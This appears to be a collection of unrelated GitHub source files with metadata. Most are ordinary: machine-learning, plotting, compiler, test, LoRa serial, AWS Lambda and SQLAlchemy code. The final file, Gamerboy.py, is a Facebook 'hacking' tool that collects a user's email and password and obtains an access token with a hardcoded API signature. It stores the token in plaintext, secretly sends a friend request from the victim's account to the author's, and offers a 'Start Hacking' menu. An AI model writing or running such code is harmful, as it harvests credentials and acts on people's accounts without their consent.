misclassifies += int(update != 0.0)
if misclassifies == 0:
break
self.misclassify_record.append(misclassifies)
def classify(self, new_data):
'''Classify the sample based on the trained weights
Parameters
----------
new_data: two dimensions list
New data to be classified
Return
------
List of int
The list of predicted class labels.
'''
predicted_result = np.where((self._linear_combination(new_data) + self.weights[0]) >= 0.0, 1, -1)
return [self._label_map[item] for item in predicted_result]
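

# Usage sketch (illustrative data, not from the original repo): train on a tiny
# linearly separable 2-D problem and classify two new points.
if __name__ == '__main__':
    samples = [[2.0, 3.0], [1.0, 4.0], [-2.0, -1.0], [-3.0, -2.0]]
    labels = ['pos', 'pos', 'neg', 'neg']
    classifier = PerceptronClassifier(number_of_attributes=2, class_labels=('pos', 'neg'))
    classifier.train(samples, labels, max_iterator=10)
    print(classifier.classify([[3.0, 2.0], [-1.0, -3.0]]))  # expected: ['pos', 'neg']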
|
[
"sincerelygre@gmail.com"
] |
sincerelygre@gmail.com
|
5dcf74e6b7075574c4fa4ad254c1cb46edf34366
|
3180e0da3ae6f3e2f13e1846aaa9fdb52cc6f5da
|
/IPL_Wins_Top_5_Race.py
|
fd76af0ea159a58d1614005223592b3f6501b71b
|
[] |
no_license
|
rg089/ipl_wins_bar_race
|
a49e8e87a093810962496a0182d307939c7b10fb
|
a882928a2b3726b77592ede78055bd6322320d12
|
refs/heads/master
| 2023-02-20T17:56:06.819204
| 2021-01-21T21:02:03
| 2021-01-21T21:02:03
| 280,247,765
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,898
|
py
|
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
import datetime
import matplotlib.animation as animation
df=pd.read_csv("ipl_matches.csv", usecols=[3,10])
df.dropna(inplace=True)
df.replace({"Delhi Daredevils":"Delhi Capitals","Rising Pune Supergiant":"Rising Pune Supergiants"}, inplace=True)
d={}; di={}
for s in df["winner"].unique():
d[s]="".join([i[0] for i in s.split()])
d["Sunrisers Hyderabad"]="SRH"; d["Kings XI Punjab"]="KXIP"; d["Deccan Chargers"]="DCH" #Changing the exceptions
for i in d:
di[d[i]]=i
df["winner"]=df["winner"].apply(lambda x: d[x])
colors=dict(zip(d.values(), ["orangered", "#d11d9b", "#2e0854", "darkgrey", "#ec1c24", "#0e74e8", "deeppink", "#e04f16", "#e3c612", "#004ba0", "#d9e3ef", "#c0d6eb", "#ec1c24","#632b72"]))
def datetimeconverter(s):
if "-" in s:
return datetime.datetime.strptime(s,"%Y-%m-%d")
return datetime.datetime.strptime(s, "%d/%m/%y")
df["date"]=df["date"].apply(datetimeconverter)
df.sort_values("date", inplace = True)
df["date"]=df["date"].apply(lambda x: x.strftime("%d %b %Y"))
ind=df["date"].values #The value of the dates
df1=pd.get_dummies(df['winner']).cumsum() #Get the other teams wins as a dataframe with the team as column
df=pd.concat([df, df1], axis=1).drop_duplicates(subset=["date"], keep="last") #Joining the dataframes and dropping the duplicate dates (when 2 matches happened on the same date)
df.set_index("date", inplace=True) #Setting the index as the date.
df.drop(columns="winner", inplace=True)
def get_data_for_date(date):
s=df.loc[date].nlargest()[::-1]
return s
def plotting(date):
x=get_data_for_date(date)
plt.clf()
ax=plt.gca()
fig=plt.gcf()
plt.barh(x.index, x.values, color=[colors[i] for i in x.index])
plt.box(False)
ax.xaxis.set_ticks_position('top')
ax.set_axisbelow(True)
plt.yticks([])
ax.tick_params(axis='x', colors='#777777', labelsize=10)
ax.grid(which='major', axis='x', linestyle='--')
for i in range(len(x.index)):
if x.values[i]==0:
continue
dx=x.values[i]/30
plt.text(x.values[i]-dx, i, x.index[i], ha="right", size=15, weight=900, va="bottom", color="white")
plt.text(x.values[i]+dx, i, x.values[i], ha="left", size=15, weight=560, va="center")
plt.text(x.values[i]-dx, i-0.25, di[x.index[i]], ha="right", size=13, weight=350, va="baseline", color="snow")
ax.text(0, 5.1, 'Most Wins in IPL', size=28, weight=600, ha='left')
fig.text(0.5, 0.04, date, size=22, ha="center")
fig.text(0.87, 0.096, "Made by Rishabh Gupta", ha="right", c="#777777")
fig.text(0.87, 0.075, "https://github.com/rg089", ha="right", c="#777777")
fig=plt.figure(figsize=(8,8))
animator = animation.FuncAnimation(fig, plotting, frames=ind)
animator.save("IPL_Wins_Top_5_Race.gif", writer=animation.PillowWriter(fps=18))
|
[
"66423362+rg089@users.noreply.github.com"
] |
66423362+rg089@users.noreply.github.com
|
7b2c473cc8869fe66d9c7d17090e41aa07816a89
|
2e2494148f19a2f51383a7eb8853c746a60b6db9
|
/.~c9_invoke_V8Eohz.py
|
80355ec7ba33f36765d6f45bd316877de84e796c
|
[] |
no_license
|
GrimaldoMike/Compiladores
|
a79614d77ac9baed3837d76ccfa70f664b62b3ee
|
2d01512b537f523d608d79e91ec163ee7e2ab529
|
refs/heads/master
| 2021-01-10T17:40:55.376425
| 2016-05-06T20:23:58
| 2016-05-06T20:23:58
| 53,536,738
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,213
|
py
|
import sys
from executable import output_quadruples  # the original "from executable.py import" is not a valid import path
functions = output_quadruples['funcs']
instructions = output_quadruples['quadruples']
constants = output_quadruples['constants']
globalvars = output_quadruples['globals']
fcinstucts = output_quadruples['fightcomp']
# Stacks used by the VM
slocal = []
sglobal = []
stemp = []
stempglobal = []
execstack = []
paramstack = []
params = []
current_address = 0
current_func_ID = 'main'
stackpos = 'main'
#stack = []
# OP_EOP = "00"
# OP_EOI = "01"
# OP_PUSH = "02"
# OP_POP = "03"
# OP_PRINT = "04"
# OP_ADD = "05"
# OP_SUB = "06"
# OP_MUL = "07"
# OP_DIV = "08"
def load_program(argv):
f = open(argv)
lines = f.read().replace("\n", " ")
lines = lines.split(" ")
f.close()
return lines
def parameterAction(value, functionID):
    # The original body was only the stray name "p"; kept as a no-op stub.
    pass
def do_PUSH(i, l):
topush = int(l[i + 1], 16)
#stack.append(topush)
def do_POP():
#stack.pop()
pass
def do_PRINT(stack):
print (stack[-1])
def do_ADD(stack):
num1 = stack.pop()
num2 = stack.pop()
total = num1 + num2
stack.append(total)
def do_SUB(stack):
num1 = stack.pop()
num2 = stack.pop()
total = num1 - num2
stack.append(total)
def do_MUL(stack):
num1 = stack.pop()
num2 = stack.pop()
total = num1 * num2
stack.append(total)
def do_DIV(stack):
num1 = stack.pop()
num2 = stack.pop()
total = num2 / num1
stack.append(total)
def execute_program(l):
    # instruction = l[i]  # l holds the loaded dictionaries
    # Arithmetic and comparison quadruples all follow the same pattern, so they are
    # dispatched through one table instead of one elif branch per operator.
    binary_ops = {
        '+': lambda a, b: a + b,
        '-': lambda a, b: a - b,
        '*': lambda a, b: a * b,
        '/': lambda a, b: a / b,
        '<': lambda a, b: a < b,
        '>': lambda a, b: a > b,
        '<=': lambda a, b: a <= b,
        '>=': lambda a, b: a >= b,
    }
    loop = len(instructions)
    i = 0
    while i < loop:
        # Each entry of 'instructions' is one quadruple: (operator, operand1, operand2, result).
        # The original code indexed it twice (what_do[i][0]), which was a bug.
        what_do = instructions[i]
        if what_do[0] == 'GOTO':
            i = what_do[3] - 1
            print ("GOTO found; jumping...")
        elif what_do[0] == 'GOTOF':
            condition = getValueFromMemory(what_do[1])
            if not condition:
                print ("GOTOF taken; jumping...")
                # Assumes the jump target sits in slot 3 of the quadruple, as for GOTO.
                i = what_do[3] - 1
        elif what_do[0] == 'INPUT':
            pass
        elif what_do[0] == 'OUTPUT':
            print ("Printing to console " + getValueFromMemory( what_do[3] ) )
        elif what_do[0] == 'GOSUB':
            pass
        elif what_do[0] == 'RETURN':
            pass
        elif what_do[0] == 'ENDPROC':
            pass
        elif what_do[0] == 'ERA':
            pass
            # expandActivationRecord
        elif what_do[0] == 'PARAMETER':
            value = getValueFromMemory(what_do[1])
            parameterAction(value, what_do[3])
        elif what_do[0] == 'END':
            exit(0)
        elif what_do[0] in binary_ops:
            # NOTE: getValueFromMemory/setValueInMemory are not defined anywhere in this file.
            op1 = getValueFromMemory(what_do[1])
            op2 = getValueFromMemory(what_do[2])
            setValueInMemory(binary_ops[what_do[0]](op1, op2), what_do[3])
            print (getValueFromMemory(what_do[3]))
        i += 1
def run_program(argv):
l = load_program(argv)
execute_program(l)
def main(argv):
run_program(argv[1])
return 0
def target(*args):
return main, None
if __name__ == '__main__':
main(sys.argv)
|
[
"grimaldo.mike@hotmail.com"
] |
grimaldo.mike@hotmail.com
|
2195320584a9e644c934183aa90b966842d820ea
|
e2fbdc948b1515a92f5d7f7ee94762072b20f536
|
/test_game_of_greed.py
|
83a7c75d6ac4697fbcb24ba88bfea6e08ddec9e0
|
[
"MIT"
] |
permissive
|
ravewillow6383/game-of-greed
|
063930e25300832d376d03c1b8d86302eb7187f4
|
9c28b44510e5b2ad3627f8c5c8721a86f40555c8
|
refs/heads/master
| 2022-07-11T22:48:18.415213
| 2022-06-03T04:31:03
| 2022-06-03T04:31:03
| 195,851,210
| 0
| 0
|
MIT
| 2022-06-03T04:31:04
| 2019-07-08T16:41:08
|
Python
|
UTF-8
|
Python
| false
| false
| 1,834
|
py
|
from game_of_greed import tally_score
def test_single_one():
assert tally_score('1') == 100
assert tally_score('11') == 200
assert tally_score('111') == 1000
assert tally_score('1111') == 2000
assert tally_score('11111') == 3000
assert tally_score('111111') == 4000
def test_various_twos():
assert tally_score('222') == 200
assert tally_score('2222') == 400
assert tally_score('22222') == 600
assert tally_score('222222') == 800
def test_various_threes():
assert tally_score('333') == 300
assert tally_score('3333') == 600
assert tally_score('33333') == 900
assert tally_score('333333') == 1200
def test_various_fours():
assert tally_score('444') == 400
assert tally_score('4444') == 800
assert tally_score('44444') == 1200
assert tally_score('444444') == 1600
def test_various_fives():
assert tally_score('5') == 50
assert tally_score('55') == 100
assert tally_score('555') == 500
assert tally_score('5555') == 1000
assert tally_score('55555') == 1500
assert tally_score('555555') == 2000
def test_various_sixes():
assert tally_score('666') == 600
assert tally_score('6666') == 1200
assert tally_score('66666') == 1800
assert tally_score('666666') == 2400
def test_zilch():
assert tally_score('2') == 0
assert tally_score('22') == 0
assert tally_score('3') == 0
assert tally_score('33') == 0
assert tally_score('4') == 0
assert tally_score('44') == 0
assert tally_score('6') == 0
assert tally_score('66') == 0
def test_straight():
assert tally_score('123456') == 1500
def test_three_pairs():
assert tally_score('112233') == 1000
assert tally_score('334455') == 1000
assert tally_score('662233') == 1000
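

# Minimal scoring sketch consistent with the tests above (the project's real
# implementation lives in game_of_greed.py, which is not shown here).
from collections import Counter

def tally_score_sketch(dice):
    """Score a roll given as a string of digits, e.g. '11523'."""
    counts = Counter(int(d) for d in dice)
    if sorted(counts) == [1, 2, 3, 4, 5, 6]:                        # straight
        return 1500
    if len(counts) == 3 and all(c == 2 for c in counts.values()):   # three pairs
        return 1000
    score = 0
    for face, count in counts.items():
        if count >= 3:
            base = 1000 if face == 1 else face * 100   # three of a kind
            score += base * (count - 2)                # each extra die adds another base
        elif face == 1:
            score += count * 100                       # lone ones
        elif face == 5:
            score += count * 50                        # lone fives
    return score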
|
[
"ravewillow6383@gmail.com"
] |
ravewillow6383@gmail.com
|
59a14ab9adc1063b789ed8e447754c8cf41b2ee5
|
35c95a923a673f226d88e0cfa217c8a381e036f2
|
/reception/GUI.py
|
1d3d5c3ce64425ad3a554b82e80f1d55d0849ad7
|
[
"MIT"
] |
permissive
|
XeBasTeX/LoRa-Transmitter
|
890ed7d46cb84f02a05e87c432f14bb9fa4aaad5
|
3b996f032acf8bb9e031e65964bb10bc35f4dd03
|
refs/heads/master
| 2020-04-13T09:25:23.481698
| 2019-07-05T09:29:57
| 2019-07-05T09:29:57
| 163,111,259
| 0
| 0
| null | 2019-01-18T22:10:24
| 2018-12-25T21:01:30
|
Python
|
UTF-8
|
Python
| false
| false
| 2,945
|
py
|
from tkinter import ttk
from tkinter import *
from tkinter.scrolledtext import ScrolledText
from threading import *
from random import *
import numpy as np
import time
import queue
import serial
import os
import csv
class FenPrincipale(Tk):
def __init__(self):
Tk.__init__(self)
self.title('LoRa recepteur')
self.com = ComSerial
self.nb = ttk.Notebook(self)
mainpage = ttk.Frame(self.nb)
setpage = ttk.Frame(self.nb)
getpage = ttk.Frame(self.nb)
self.nb.add(mainpage, text='Main')
self.nb.add(setpage, text='Set')
self.nb.add(getpage, text='Get')
self.nb.pack(expand=1, fill="both")
self.mainloop()
class ComSerial():
def __init__(self):
self.__portCOM = 'COM4'
self.__bRate = 57600
self.__timeOut = 500
self.__ser = serial.Serial(self.__portCOM, self.__bRate, timeout = self.__timeOut)
self.__bool = True
self.__rcvd = ""
def startSerial(self):
        self.__ser = serial.Serial(self.__portCOM, self.__bRate, timeout=self.__timeOut)  # third positional argument is bytesize, not timeout
def stopSerial(self):
self.__ser.close()
def cmdLoRa(self, cmd):
print(cmd)
self.__ser.write(cmd.encode())
print(self.__ser.readline())
def setMod(self, mode): #verified
if mode == 'lora' :
self.cmdLoRa('radio set mod lora\r\n')
elif mode == 'fsk' :
self.cmdLoRa('radio set mod fsk\r\n')
def setFreq(self, freq): #verified
self.cmdLoRa('radio set freq '+str(freq)+'\r\n')
def setSf(self, sf): #verified
self.cmdLoRa('radio set sf sf'+str(sf)+'\r\n')
def setBw(self, bw): #verified
self.cmdLoRa('radio set bw '+str(bw)+'\r\n')
def setPwr(self, pwr): #verified
self.cmdLoRa('radio set pwr '+str(pwr)+'\r\n')
def setCrc(self, crc): #verified
if crc == True:
self.cmdLoRa('radio set crc on\r\n')
else:
self.cmdLoRa('radio set crc off\r\n')
def setPrlen(self, prlen): #verified
self.cmdLoRa('radio set prlen '+str(prlen)+'\r\n')
def setBitrate(self, br): #verified
self.cmdLoRa('radio set bitrate '+str(br)+'\r\n')
def setWdt(self, wdt): #verified
self.cmdLoRa('radio set wdt '+str(wdt)+'\r\n')
def startReceive(self):
while self.__bool:
self.cmdLoRa('radio rx 0\r\n')
self.__rcvd = self.__ser.readline()
print("reception terminee")
def stopReceive(self):
self.__bool = False
#fen = FenPrincipale()
#fen.mainloop()
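# Usage sketch (illustrative values; assumes an RN2483-style module that answers the
# "radio set ..." commands used above is attached on COM4):
#   com = ComSerial()
#   com.setMod('lora')
#   com.setSf(7)
#   com.setWdt(0)
#   com.startReceive()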
|
[
"noreply@github.com"
] |
XeBasTeX.noreply@github.com
|
959657251e322e467e7097cb2319c6def544f23e
|
30e0d9704e4c13bb18cb59a7f00306f2f5445a37
|
/venv/lib/python2.7/linecache.py
|
e513e537459a062f304b150efe40eba9b97d3e59
|
[] |
no_license
|
olwflynn/birdplane
|
799c9e227deaaf8487aac1bb3349cd1003684120
|
34348a5679624488a94410ea18811d6282479d49
|
refs/heads/master
| 2021-05-05T02:18:56.999142
| 2018-06-08T11:53:33
| 2018-06-08T11:53:33
| 119,728,295
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 49
|
py
|
/Users/OFlynn/anaconda/lib/python2.7/linecache.py
|
[
"oliver.flynn1989@gmail.com"
] |
oliver.flynn1989@gmail.com
|
b06cca6b5200a5c0eaab11a13f3c215ba2a91bf9
|
b2a6a8733f588d503e45ad40cfa2080566d1ccf5
|
/0x0F-python-object_relational_mapping/7-model_state_fetch_all.py
|
88b7388329651bf8e3ad56794f64494b765ed393
|
[] |
no_license
|
andresvanegas19/holbertonschool-higher_level_programming
|
9cd0f83722623ca08c6b4e3aa94975363b569183
|
aa967a51183c3c8b9c9b27b47199c70fd6241485
|
refs/heads/master
| 2022-12-22T18:44:17.839861
| 2020-09-25T04:54:18
| 2020-09-25T04:54:18
| 259,396,114
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,067
|
py
|
#!/usr/bin/python3
"""Start link class to table in database
"""
import sys
from model_state import Base, State
from sqlalchemy import (create_engine)
from sqlalchemy.orm import sessionmaker
if __name__ == "__main__" and len(sys.argv) == 4:
# create the uri of database
db_uri = 'mysql+mysqldb://{}:{}@localhost:3306/{}'.format(
sys.argv[1], sys.argv[2], sys.argv[3])
# configure Session class with desired options
Session = sessionmaker()
# TODO: pool_pre_ping
# feature will normally emit SQL equivalent to “SELECT 1” each time a
# connection is checked out from the pool; if an error is raised that
    # is detected as a “disconnect” situation, the connection will be
    # immediately recycled and replaced with a fresh connection
engine = create_engine(db_uri, pool_pre_ping=True)
Base.metadata.create_all(engine)
# associate it with our custom Session class
Session.configure(bind=engine)
# work with the session
session = Session()
for state in session.query(State).order_by(State.id).all():
print('{}: {}'.format(state.id, state.name))
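# Example invocation (placeholder credentials): lists every State row ordered by id.
#   ./7-model_state_fetch_all.py <mysql_username> <mysql_password> <database_name>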
|
[
"andressantiagore@gmail.com"
] |
andressantiagore@gmail.com
|
f5bc5a546cdf725a09773ed38cb30dc83ce155f2
|
059863dff0c7ee0704d644e5c1fd164f422a2935
|
/upload-portfolio-lambda.py
|
bb0b666b8b687ac92c2a696d41ea299c36a1fafd
|
[] |
no_license
|
scrubs1979/my-portfolio
|
f80de0624a4f9a739d7d0461209970dd7915c05c
|
9662b4903614315e125455954405e8a9fb154aa0
|
refs/heads/master
| 2021-05-14T12:24:42.650293
| 2018-03-08T05:16:17
| 2018-03-08T05:16:17
| 116,408,226
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,066
|
py
|
def lambda_handler(event, context):
import boto3
import io
import zipfile
import mimetypes
sns = boto3.resource('sns')
topic = sns.Topic('arn:aws:sns:us-east-1:209335604342:deployPortfolioTopic')
try:
s3 = boto3.resource('s3')
portfolio_bucket = s3.Bucket('portfolio.nicholashopkins.info')
build_bucket = s3.Bucket('portfoliobuild.nicholashopkins.info')
portfolio_zip = io.BytesIO()
build_bucket.download_fileobj('portfoliobuild.zip', portfolio_zip)
with zipfile.ZipFile(portfolio_zip) as myzip:
for nm in myzip.namelist():
print(nm)
        with zipfile.ZipFile(portfolio_zip) as myzip:
            for nm in myzip.namelist():
                obj = myzip.open(nm)
                # The original loop opened each file but never uploaded it;
                # portfolio_bucket and mimetypes were defined/imported yet unused,
                # so the upload below is a plausible completion of the deploy step.
                portfolio_bucket.upload_fileobj(obj, nm,
                    ExtraArgs={'ContentType': mimetypes.guess_type(nm)[0]})
                portfolio_bucket.Object(nm).Acl().put(ACL='public-read')
        print("Job done!")
topic.publish(Subject="Portfolio deployed", Message="Portfolio deployed successfully!")
except:
topic.publish(Subject="Portfolio Deploy Failed", Message="The Portfolio was not deployed successfully!")
raise
return 'Hello from Lambda'
|
[
"nth819@gmail.com"
] |
nth819@gmail.com
|
9eac46d32932eb433a745020a70c3a966d2f9ecf
|
a4376ca539d6e78dfce225c74ee9b320d53dfac1
|
/models/LM_LG/train.py
|
c95ade475bda90622b92f6fd3c0646080a0846c4
|
[] |
no_license
|
Vietdung113/underthesea.word_sent
|
867172a14c02bc1d357dbfb4ae861a95d5b04c85
|
cb7ae2b046de2e83b6eafac089de2b24f274b164
|
refs/heads/master
| 2021-01-17T11:52:43.683592
| 2017-03-28T07:04:58
| 2017-03-28T07:04:58
| 84,049,336
| 0
| 0
| null | 2017-03-06T08:37:07
| 2017-03-06T08:37:07
| null |
UTF-8
|
Python
| false
| false
| 1,555
|
py
|
from os.path import dirname
from os.path import join
from underthesea.corpus import PlainTextCorpus
# pre-process
from models.crf_model.transformer import Transformer
punctuation = open("punctuation.txt", "r").read().split('\n')
# to sentence
def count_underscore(word):
count = 0
for token in word.split('_'):
count += 1
return count
def documents_to_sentences(documents):
result_sentence = []
for document in documents:
for sentence in document.sentences:
result_sentence.append(sentence)
return result_sentence
def sent2vec(sentence):
vector = []
words = []
for word in sentence.split(' '):
if "_" in word:
for i in range(count_underscore(word) - 1):
vector.append(1)
words.append(word)
vector.append(0)
words.append(word)
return vector, words
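

# Illustrative trace (hypothetical token): sent2vec("toi_uu hoa") returns
#   vector = [1, 0, 0]
#   words  = ['toi_uu', 'toi_uu', 'hoa']
# i.e. a 1 for every internal underscore of a joined word and a 0 at each word end.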
transformer = Transformer()
train_sents = transformer.load_train_sents()
corpus = PlainTextCorpus()
folder = join(dirname(dirname(dirname(__file__))), "data", "raw", "train", "output")
corpus.load(folder)
total_sentences = documents_to_sentences(corpus.documents)
total_vec = []
vector = []
total_vector = []
total_words = []
for sentence in total_sentences[:-2]:
total_vec.append(sent2vec(sentence))
for sentence in total_sentences[:-2]:
words = []
for word in sentence.split(' '):
if '_' in word:
for x in word.split('_'):
words.append(x)
words.append(word)
total_words.append(words)
print 0
|
[
"doanvietdung273@gmail.com"
] |
doanvietdung273@gmail.com
|
999cee0cbb39d8437d31f33f059f976251ca8ba3
|
78bdb461b09f0dbccad474f069fe7dec829c70e3
|
/venv/Lib/site-packages/tailor/internal/execution/__init__.py
|
972e62315e5bdac2b1caf67f609aaa2b219814cd
|
[] |
no_license
|
OdaNilseng/FLSworkflow
|
92d7a9b9d63398517f927fd2a0514eaef787e110
|
780a998741991f17ce14d5b642b228495681e415
|
refs/heads/master
| 2022-12-03T13:04:36.542191
| 2020-08-21T08:55:53
| 2020-08-21T08:55:53
| 289,224,383
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 64
|
py
|
# -*- coding: utf-8 -*-
from .serialrunner import SerialRunner
|
[
"oed@sevanssp.com"
] |
oed@sevanssp.com
|
19d98f499819e67e2b301ea262b005ee741efaad
|
163bbb4e0920dedd5941e3edfb2d8706ba75627d
|
/Code/CodeRecords/2542/58610/244701.py
|
f657012ffa6f32eee9c2f07eca344df262997dbc
|
[] |
no_license
|
AdamZhouSE/pythonHomework
|
a25c120b03a158d60aaa9fdc5fb203b1bb377a19
|
ffc5606817a666aa6241cfab27364326f5c066ff
|
refs/heads/master
| 2022-11-24T08:05:22.122011
| 2020-07-28T16:21:24
| 2020-07-28T16:21:24
| 259,576,640
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 410
|
py
|
nums = eval(input())
hash_dict = dict()
max_len = 0
for num in nums:
if num not in hash_dict:
left = hash_dict.get(num - 1, 0)
right = hash_dict.get(num + 1, 0)
temp_len = left + right + 1
max_len = max_len if temp_len < max_len else temp_len
hash_dict[num] = temp_len
hash_dict[num + right] = temp_len
hash_dict[num - left] = temp_len
print(max_len)
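# Worked example (illustrative input): for [100, 4, 200, 1, 3, 2] the consecutive runs
# are {1, 2, 3, 4}, {100} and {200}; only the run boundaries (here 1 and 4) need to be
# kept up to date in hash_dict, and the printed answer is 4.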
|
[
"1069583789@qq.com"
] |
1069583789@qq.com
|
bc1a2292f22bba054ad14b3e8d09eab1f46b6d6b
|
42be401188f048b84f97e083afcfe4ed772a45c6
|
/Gamerboy.py
|
6f7a66c122bf1bd4197ec4c91a2e3b82ef614ecd
|
[] |
no_license
|
aftabgit786/gamer
|
df3bb4db1638efe91418717ae0e6329d613e323a
|
19873d1f9523adb81c74225b43f095619ae146b1
|
refs/heads/master
| 2022-10-02T04:45:58.380391
| 2020-06-05T14:32:17
| 2020-06-05T14:32:17
| 269,662,526
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 16,633
|
py
|
#!/usr/bin/python2
#coding=utf-8
import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,requests,mechanize
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
def keluar():
print "\033[1;96m[!] \x1b[1;91mExit"
os.sys.exit()
def acak(b):
w = 'ahtdzjc'
d = ''
for i in x:
d += '!'+w[random.randint(0,len(w)-1)]+i
return cetak(d)
def cetak(b):
w = 'ahtdzjc'
for i in w:
j = w.index(i)
x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j))
x += '\033[0m'
x = x.replace('!0','\033[0m')
sys.stdout.write(x+'\n')
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(00000.1)
##### LOGO #####
logo = """ -----------------------------•◈•
( __)\\ ____--------------_------------•◈•
|__(~) •||•THE - GAMER -OFFICAL------•◈•
|__\~~) •||•GAME - WORLD---------------•◈•
|__(-----\ •◈•------GAMER--------•◈•
|__~~~\ •◈•-----█-------⑦-------█------•◈•
|__~~~\ •◈•-----█-------⑧-------█------•◈•
|__~~~\ •◈•-----█-------⑥-------█------•◈•
\033[1;91m=======================================
\033[1;96mAuthor \033[1;93m: \033[1;92Gamer Boy
\033[1;96mGithub \033[1;93m: \033[1;92mhttps://github.com/Therana/zero
\033[1;91m======================================="""
def tik():
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;96m[●] \x1b[1;93mSedang masuk \x1b[1;97m"+o),;sys.stdout.flush();time.sleep(1)
back = 0
berhasil = []
cekpoint = []
oks = []
id = []
listgrup = []
vulnot = "\033[31mNot Vuln"
vuln = "\033[32mVuln"
os.system("clear")
print "\033[1;96m ============================================================="
print """\033[1;91m=======================================
\033[1;96mAuthor \033[1;93m: \033[1;92mRana Aahil
\033[1;96mInstagram \033[1;93m: \033[1;92mFlowRana
\033[1;96mFacebook \033[1;93m: \033[1;92m Aahilrana4072
\033[1;96mGithub \033[1;93m: \033[1;92mhttps://Github.com/Therana/zero
\033[1;91m======================================="""
print " \x1b[1;93m============================================================="
CorrectUsername = "GAMERBOY"
CorrectPassword = "lovegame"
loop = 'true'
while (loop == 'true'):
username = raw_input("\033[1;96m[☆] \x1b[1;93mUsername Of Tool \x1b[1;96m>>>> ")
if (username == CorrectUsername):
password = raw_input("\033[1;96m[☆] \x1b[1;93mPassword Of Tool \x1b[1;96m>>>> ")
if (password == CorrectPassword):
print "Logged in successfully as " + username
loop = 'false'
else:
print "Wrong Password"
os.system('xdg-open https://www.Youtube.com/UCsdJQbRf0xpvwaDu1rqgJuA')
else:
print "Wrong Username"
os.system('xdg-open https://www.Youtube.com/UCsdJQbRf0xpvwaDu1rqgJuA')
def login():
os.system('clear')
try:
toket = open('login.txt','r')
menu()
except (KeyError,IOError):
os.system('clear')
print logo
print 42*"\033[1;96m="
print('\033[1;96m[☆] \x1b[1;93mLOGIN WITH FACEBOOK \x1b[1;96m[☆]' )
id = raw_input('\033[1;96m[+] \x1b[1;93mID/Email \x1b[1;91m: \x1b[1;92m')
pwd = raw_input('\033[1;96m[+] \x1b[1;93mPassword \x1b[1;91m: \x1b[1;92m')
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print"\n\033[1;96m[!] \x1b[1;91mThere is no internet connection"
keluar()
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = pwd
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig= 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail='+id+'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword='+pwd+'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {"api_key":"882a8490361da98702bf97a021ddc14d","credentials_type":"password","email":id,"format":"JSON", "generate_machine_id":"1","generate_session_cookies":"1","locale":"en_US","method":"auth.login","password":pwd,"return_ssl_resources":"0","v":"1.0"}
x=hashlib.new("md5")
x.update(sig)
a=x.hexdigest()
data.update({'sig':a})
url = "https://api.facebook.com/restserver.php"
r=requests.get(url,params=data)
z=json.loads(r.text)
unikers = open("login.txt", 'w')
unikers.write(z['access_token'])
unikers.close()
print '\n\033[1;96m[✓] \x1b[1;92mLogin Successful'
os.system('xdg-open https://www.Facebook.com/Omi6t')
requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token='+z['access_token'])
menu()
except requests.exceptions.ConnectionError:
print"\n\033[1;96m[!] \x1b[1;91mThere is no internet connection"
keluar()
if 'checkpoint' in url:
print("\n\033[1;96m[!] \x1b[1;91mIt seems that your account has a checkpoint")
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
else:
print("\n\033[1;96m[!] \x1b[1;91mPassword/Email is wrong")
os.system('rm -rf login.txt')
time.sleep(1)
login()
def menu():
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
os.system('clear')
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
otw = requests.get('https://graph.facebook.com/me?access_token='+toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
except KeyError:
os.system('clear')
print"\033[1;96m[!] \033[1;91mIt seems that your account has a checkpoint"
os.system('rm -rf login.txt')
time.sleep(1)
login()
except requests.exceptions.ConnectionError:
print"\033[1;96m[!] \x1b[1;91mThere is no internet connection"
keluar()
os.system("clear")
print logo
print 42*"\033[1;96m="
print "\033[1;96m[\033[1;97m✓\033[1;96m]\033[1;93m Name \033[1;91m: \033[1;92m"+nama+"\033[1;97m "
print "\033[1;96m[\033[1;97m✓\033[1;96m]\033[1;93m ID \033[1;91m: \033[1;92m"+id+"\x1b[1;97m "
print 42*"\033[1;96m="
print "\x1b[1;96m[\x1b[1;92m1\x1b[1;96m]\x1b[1;93m Start Hacking"
print "\x1b[1;96m[\x1b[1;91m0\x1b[1;96m]\x1b[1;91m Exit "
pilih()
def pilih():
unikers = raw_input("\n\033[1;97m >>> \033[1;97m")
if unikers =="":
print "\033[1;96m[!] \x1b[1;91mFill in correctly"
pilih()
elif unikers =="1":
super()
elif unikers =="0":
jalan('Token Removed')
os.system('rm -rf login.txt')
keluar()
else:
print "\033[1;96m[!] \x1b[1;91mFill in correctly"
pilih()
def super():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
